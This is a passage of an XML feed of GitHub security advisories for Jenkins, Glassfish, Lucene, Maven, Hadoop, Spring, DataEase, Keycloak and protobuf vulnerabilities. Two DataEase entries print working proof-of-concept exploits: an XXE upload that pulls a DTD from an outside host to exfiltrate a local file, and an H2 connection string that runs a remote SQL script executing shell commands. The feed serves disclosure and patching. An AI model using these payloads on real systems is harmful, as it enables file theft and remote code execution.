<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3448" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3448</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f9qj-77q2-h5c5</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f9qj-77q2-h5c5</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins OpenId Connect Authentication Plugin lacks issuer claim validation</title>
<description><p>Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the <code class="notranslate">iss</code> (Issuer) claim of an ID Token during its authentication flow, a value that identifies the Originating Party (IdP).</p>
<p>This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins.</p>
<p>OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the <code class="notranslate">iss</code> (Issuer) claim of an ID Token during its authentication flow when the Issuer is known.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47807" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47807</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(2)" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(2)</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8pjw-fff6-3mjv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8pjw-fff6-3mjv</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins OpenId Connect Authentication Plugin lacks audience claim validation</title>
<description><p>Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the <code class="notranslate">aud</code> (Audience) claim of an ID Token during its authentication flow, a value to verify the token is issued for the correct client.</p>
<p>This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins.</p>
<p>OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the <code class="notranslate">aud</code> (Audience) claim of an ID Token during its authentication flow.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47806" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47806</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(1)" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(1)</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-49hx-9mm2-7675</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-49hx-9mm2-7675</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins exposes multi-line secrets through error messages</title>
<description><p>Jenkins provides the <code class="notranslate">secretTextarea</code> form field for multi-line secrets.</p>
<p>Jenkins 2.478 and earlier, LTS 2.462.2 and earlier does not redact multi-line secret values in error messages generated for form submissions involving the <code class="notranslate">secretTextarea</code> form field.</p>
<p>This can result in exposure of multi-line secrets through those error messages, e.g., in the system log.</p>
<p>Jenkins 2.479, LTS 2.462.3 redacts multi-line secret values in error messages generated for form submissions involving the <code class="notranslate">secretTextarea</code> form field.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47803" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47803</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3451" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3451</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pj95-ph4q-4qm4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pj95-ph4q-4qm4</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Eclipse Glassfish improperly handles http parameters</title>
<description><p>In Eclipse Glassfish versions before 7.0.17, the Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is <code class="notranslate">/management/domain</code>. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9329" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9329</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2473331185" data-permission-text="Title is private" data-url="https://github.com/eclipse-ee4j/glassfish/issues/25106" data-hovercard-type="pull_request" data-hovercard-url="/eclipse-ee4j/glassfish/pull/25106/hovercard" href="https://github.com/eclipse-ee4j/glassfish/pull/25106">eclipse-ee4j/glassfish#25106</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/232" rel="nofollow">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/232</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/eclipse-ee4j/glassfish/commit/6ca35eee2ba90a8108984b27bec33f9cc50cd83b/hovercard" href="https://github.com/eclipse-ee4j/glassfish/commit/6ca35eee2ba90a8108984b27bec33f9cc50cd83b">eclipse-ee4j/glassfish@<tt>6ca35ee</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jq3f-mfmg-747x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jq3f-mfmg-747x</guid>
<pubDate>Mon, 30 Sep 2024 09:30:47 GMT</pubDate>
</item>
<item>
<title>Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator.</title>
<description><p>This issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0.<br>
The deprecated org.apache.lucene.replicator.http package is affected.<br>
The org.apache.lucene.replicator.nrt package is not affected.</p>
<p>Users are recommended to upgrade to version 9.12.0, which fixes the issue.</p>
<p>Java serialization filters (such as <code class="notranslate">-Djdk.serialFilter='!*'</code> on the command line) can mitigate the issue on vulnerable versions without impacting functionality.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45772" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45772</a></li>
<li><a href="https://lists.apache.org/thread/3f3oph7bqnqspb9q5p0gm5mgc1b6thjo" rel="nofollow">https://lists.apache.org/thread/3f3oph7bqnqspb9q5p0gm5mgc1b6thjo</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g643-xq6w-r67c</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g643-xq6w-r67c</guid>
<pubDate>Mon, 30 Sep 2024 09:30:47 GMT</pubDate>
</item>
<item>
<title>Maven Archetype Plugin: Maven Archetype integration-test may package local settings into the published artifact, possibly containing credentials</title>
<description><p>Exposure of Sensitive Information to an Unauthorized Actor, Insecure Storage of Sensitive Information vulnerability in Maven Archetype Plugin.</p>
<p>This issue affects Maven Archetype Plugin: from 3.2.1 before 3.3.0.</p>
<p>Users are recommended to upgrade to version 3.3.0, which fixes the issue.</p>
<p>Archetype integration testing creates a file called <code class="notranslate">./target/classes/archetype-it/archetype-settings.xml</code>. This file contains all the content from the user's <code class="notranslate">~/.m2/settings.xml</code> file, which often contains information they do not want to publish. We expect that on many developer machines this also contains credentials.</p>
<p>When the user runs mvn verify again (without a mvn clean), this file becomes part of the final artifact.</p>
<p>If a developer were to publish this into Maven Central or any other remote repository (whether as a release or a snapshot) their credentials would be published without them knowing.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47197" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47197</a></li>
<li><a href="https://lists.apache.org/thread/ftg81np183wnyk0kg4ks95dvgxdrof96" rel="nofollow">https://lists.apache.org/thread/ftg81np183wnyk0kg4ks95dvgxdrof96</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2229915212" data-permission-text="Title is private" data-url="https://github.com/apache/maven-archetype/issues/188" data-hovercard-type="pull_request" data-hovercard-url="/apache/maven-archetype/pull/188/hovercard" href="https://github.com/apache/maven-archetype/pull/188">apache/maven-archetype#188</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/apache/maven-archetype/commit/484b6ab946f0d7ce557a3df28615d8c51e500054/hovercard" href="https://github.com/apache/maven-archetype/commit/484b6ab946f0d7ce557a3df28615d8c51e500054">apache/maven-archetype@<tt>484b6ab</tt></a></li>
<li><a href="https://issues.apache.org/jira/browse/ARCHETYPE-657" rel="nofollow">https://issues.apache.org/jira/browse/ARCHETYPE-657</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-2qq7-fch2-phqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-2qq7-fch2-phqf</guid>
<pubDate>Thu, 26 Sep 2024 09:31:42 GMT</pubDate>
</item>
<item>
<title>Apache Hadoop: Temporary File Local Information Disclosure</title>
<description><p>Apache Hadoop’s <code class="notranslate">RunJar.run()</code> does not set permissions on the temporary directory it creates by default. If sensitive data is present in that directory, all other local users may be able to view it, because on Unix-like systems the system temporary directory is shared between all local users. Files written to this directory without explicitly setting the correct POSIX permissions may therefore be viewable by all other local users.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23454" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-23454</a></li>
<li><a href="https://issues.apache.org/jira/browse/HADOOP-19031" rel="nofollow">https://issues.apache.org/jira/browse/HADOOP-19031</a></li>
<li><a href="https://lists.apache.org/thread/xlo7q8kn4tsjvx059r789oz19hzgfkfs" rel="nofollow">https://lists.apache.org/thread/xlo7q8kn4tsjvx059r789oz19hzgfkfs</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/apache/hadoop/commit/8c2836402fbb2f619f1fef4ef625a8542e853a64/hovercard" href="https://github.com/apache/hadoop/commit/8c2836402fbb2f619f1fef4ef625a8542e853a64">apache/hadoop@<tt>8c28364</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f5fw-25gw-5m92</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f5fw-25gw-5m92</guid>
<pubDate>Wed, 25 Sep 2024 09:30:46 GMT</pubDate>
</item>
<item>
<title>Apache Linkis Spark EngineConn: Commons Lang's RandomStringUtils Random string security vulnerability</title>
<description><p>In Apache Linkis &lt;= 1.5.0, Spark EngineConn has a random string security vulnerability: the random string generated for the Token when starting Py4j uses Commons Lang's RandomStringUtils.<br>
Users are recommended to upgrade to version 1.6.0, which fixes this issue.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39928" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-39928</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/apache/linkis/commit/82c2f4b201b746e9206bb58ef98f536fc333aa07/hovercard" href="https://github.com/apache/linkis/commit/82c2f4b201b746e9206bb58ef98f536fc333aa07">apache/linkis@<tt>82c2f4b</tt></a></li>
<li><a href="https://lists.apache.org/thread/g664n13nb17rsogcfrn8kjgd8m89p8nw" rel="nofollow">https://lists.apache.org/thread/g664n13nb17rsogcfrn8kjgd8m89p8nw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6gch-63wp-4v5f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6gch-63wp-4v5f</guid>
<pubDate>Wed, 25 Sep 2024 03:30:35 GMT</pubDate>
</item>
<item>
<title>Spring Framework DoS via conditional HTTP request</title>
<description><h3>Description</h3>
<p>Applications that parse ETags from <code class="notranslate">If-Match</code> or <code class="notranslate">If-None-Match</code> request headers are vulnerable to DoS attack.</p>
<h3>Affected Spring Products and Versions</h3>
<p>org.springframework:spring-web in versions</p>
<p>6.1.0 through 6.1.11<br>
6.0.0 through 6.0.22<br>
5.3.0 through 5.3.37</p>
<p>Older, unsupported versions are also affected</p>
<h3>Mitigation</h3>
<p>Users of affected versions should upgrade to the corresponding fixed version.<br>
6.1.x -&gt; 6.1.12<br>
6.0.x -&gt; 6.0.23<br>
5.3.x -&gt; 5.3.38<br>
No other mitigation steps are necessary.</p>
<p>Users of older, unsupported versions could enforce a size limit on <code class="notranslate">If-Match</code> and <code class="notranslate">If-None-Match</code> headers, e.g. through a Filter.</p>
<h3>References</h3>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2461347390" data-permission-text="Title is private" data-url="https://github.com/spring-projects/spring-framework/issues/33372" data-hovercard-type="issue" data-hovercard-url="/spring-projects/spring-framework/issues/33372/hovercard" href="https://github.com/spring-projects/spring-framework/issues/33372">spring-projects/spring-framework#33372</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/spring-projects/spring-framework/commit/582bfccbb72e5c8959a0b472d1dc7d03a20520f3/hovercard" href="https://github.com/spring-projects/spring-framework/commit/582bfccbb72e5c8959a0b472d1dc7d03a20520f3">spring-projects/spring-framework@<tt>582bfcc</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/spring-projects/spring-framework/commit/8d16a50907c11f7e6b407d878a26e84eba08a533/hovercard" href="https://github.com/spring-projects/spring-framework/commit/8d16a50907c11f7e6b407d878a26e84eba08a533">spring-projects/spring-framework@<tt>8d16a50</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85/hovercard" href="https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85">spring-projects/spring-framework@<tt>bb17ad8</tt></a></li>
<li><a href="https://spring.io/security/cve-2024-38809" rel="nofollow">https://spring.io/security/cve-2024-38809</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38809" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-38809</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-2rmj-mq67-h97g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-2rmj-mq67-h97g</guid>
<pubDate>Tue, 24 Sep 2024 18:34:43 GMT</pubDate>
</item>
<item>
<title>DataEase has an XML External Entity Reference vulnerability</title>
<description><h3>Impact</h3>
<p>There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.</p>
<ol>
<li>send request:</li>
</ol>
<pre class="notranslate"><code class="notranslate">POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn
------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a
&lt;?xml version='1.0'?&gt;
&lt;!DOCTYPE xxe [
&lt;!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'&gt;
%EvilDTD;
%LoadOOBEnt;
%OOB;
]&gt;
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// contents of 1.dtd
&lt;!ENTITY % resource SYSTEM "file:///etc/alpine-release"&gt;
&lt;!ENTITY % LoadOOBEnt "&lt;!ENTITY &amp;#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'&gt;"&gt;
</code></pre>
<ol start="2">
<li>After sending the request, the content of the file /etc/alpine-release is successfully read</li>
</ol>
<pre class="notranslate"><code class="notranslate">::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
</code></pre>
<p>Affected versions: &lt;= 2.10.0</p>
<h3>Patches</h3>
<p>The vulnerability has been fixed in v2.10.1.</p>
<h3>Workarounds</h3>
<p>It is recommended to upgrade the version to v2.10.1.</p>
<h3>References</h3>
<p>If you have any questions or comments about this advisory:</p>
<p>Open an issue in <a href="https://github.com/dataease/dataease">https://github.com/dataease/dataease</a><br>
Email us at <a href="mailto:wei@fit2cloud.com">wei@fit2cloud.com</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-4m9p-7xg6-f4mm" href="https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm">GHSA-4m9p-7xg6-f4mm</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46985" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46985</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4m9p-7xg6-f4mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4m9p-7xg6-f4mm</guid>
<pubDate>Mon, 23 Sep 2024 20:27:22 GMT</pubDate>
</item>
<item>
<title>DataEase's H2 datasource has a remote command execution risk</title>
<description><h3>Impact</h3>
<p>An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string.</p>
<p>request message:</p>
<pre class="notranslate"><code class="notranslate">POST /de2api/datasource/validate HTTP/1.1
Host: dataease.ubuntu20.vm
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-DE-TOKEN: jwt
Content-Length: 209
Content-Type: application/json
{
"id": "",
"name": "test",
"type": "h2",
"configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="
}
</code></pre>
<p>h2 data source connection string:</p>
<pre class="notranslate"><code class="notranslate">// configuration
{
"jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.168.174.1:8000/poc.sql';",
}
</code></pre>
<p>the content of poc.sql:</p>
<pre class="notranslate"><code class="notranslate">// poc.sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('touch /tmp/jdbch2rce')
</code></pre>
<p>You can see that the file was created successfully in docker:</p>
<pre class="notranslate"><code class="notranslate">/tmp # ls -l jdbch2rce
-rw-r--r-- 1 root root 0 Sep 16 22:02 jdbch2rce
</code></pre>
<p>Affected versions: &lt;= 2.10.0</p>
<h3>Patches</h3>
<p>The vulnerability has been fixed in v2.10.1.</p>
<h3>Workarounds</h3>
<p>It is recommended to upgrade the version to v2.10.1.</p>
<h3>References</h3>
<p>If you have any questions or comments about this advisory:</p>
<p>Open an issue in <a href="https://github.com/dataease/dataease">https://github.com/dataease/dataease</a><br>
Email us at <a href="mailto:wei@fit2cloud.com">wei@fit2cloud.com</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-h7mj-m72h-qm8w" href="https://github.com/dataease/dataease/security/advisories/GHSA-h7mj-m72h-qm8w">GHSA-h7mj-m72h-qm8w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46997" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46997</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-h7mj-m72h-qm8w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-h7mj-m72h-qm8w</guid>
<pubDate>Mon, 23 Sep 2024 20:27:11 GMT</pubDate>
</item>
<item>
<title>Keycloak SAML signature validation flaw</title>
<description><p>A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8698" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8698</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-8698" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-8698</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2311641" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2311641</a></li>
<li><a href="https://github.com/keycloak/keycloak/blob/main/saml-core/src/main/java/org/keycloak/saml/processing/core/util/XMLSignatureUtil.java#L415">https://github.com/keycloak/keycloak/blob/main/saml-core/src/main/java/org/keycloak/saml/processing/core/util/XMLSignatureUtil.java#L415</a></li>
<li><a href="https://github.com/keycloak/keycloak/releases/tag/25.0.6">https://github.com/keycloak/keycloak/releases/tag/25.0.6</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6878" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6878</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6879" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6879</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6880" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6880</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6882" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6882</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6886" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6886</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6887" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6887</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6888" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6888</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6889" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6889</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6890" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6890</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4xx7-2cx3-x473</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4xx7-2cx3-x473</guid>
<pubDate>Thu, 19 Sep 2024 18:30:52 GMT</pubDate>
</item>
<item>
<title>Keycloak Open Redirect vulnerability</title>
<description><p>A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to <a href="http://localhost/" rel="nofollow">http://localhost</a> or <a href="http://127.0.0.1/" rel="nofollow">http://127.0.0.1</a>, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8883" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8883</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-8883" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-8883</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2312511" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2312511</a></li>
<li><a href="https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java">https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java</a></li>
<li><a href="https://github.com/keycloak/keycloak/releases/tag/25.0.6">https://github.com/keycloak/keycloak/releases/tag/25.0.6</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6878" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6878</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6879" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6879</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6880" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6880</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6882" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6882</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6886" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6886</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6887" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6887</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6888" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6888</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6889" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6889</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6890" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6890</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vvf8-2h68-9475</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vvf8-2h68-9475</guid>
<pubDate>Thu, 19 Sep 2024 18:30:52 GMT</pubDate>
</item>
<item>
<title>protobuf-java has potential Denial of Service issue</title>
<description><h3>Summary</h3>
<p>When parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.</p>
<p>Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team <a href="mailto:ecosystem@trailofbits.com">ecosystem@trailofbits.com</a></p>
<p>Affected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.</p>
<h3>Severity</h3>
<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254" rel="nofollow">CVE-2024-7254</a> <strong>High</strong> CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)<br>
This is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.</p>
<h3>Proof of Concept</h3>
<p>For reproduction details, please refer to the unit tests (Protobuf Java <a href="https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java">LiteTest</a> and <a href="https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java">CodedInputStreamTest</a>) that identify the specific inputs that exercise this parsing weakness.</p>
<h3>Remediation and Mitigation</h3>
<p>We have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:</p>
<ul>
<li>protobuf-java (3.25.5, 4.27.5, 4.28.2)</li>
<li>protobuf-javalite (3.25.5, 4.27.5, 4.28.2)</li>
<li>protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)</li>
<li>protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)</li>
<li>com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-735f-pc8j-v9w8" href="https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8">GHSA-735f-pc8j-v9w8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7254" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7254</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b">protocolbuffers/protobuf@<tt>4728531</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b">protocolbuffers/protobuf@<tt>850fcce</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534">protocolbuffers/protobuf@<tt>9a5f5fe</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46">protocolbuffers/protobuf@<tt>ac9fb5b</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa">protocolbuffers/protobuf@<tt>cc8b348</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3">protocolbuffers/protobuf@<tt>d6c82fc</tt></a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2024-7254.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2024-7254.yml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-735f-pc8j-v9w8</link>
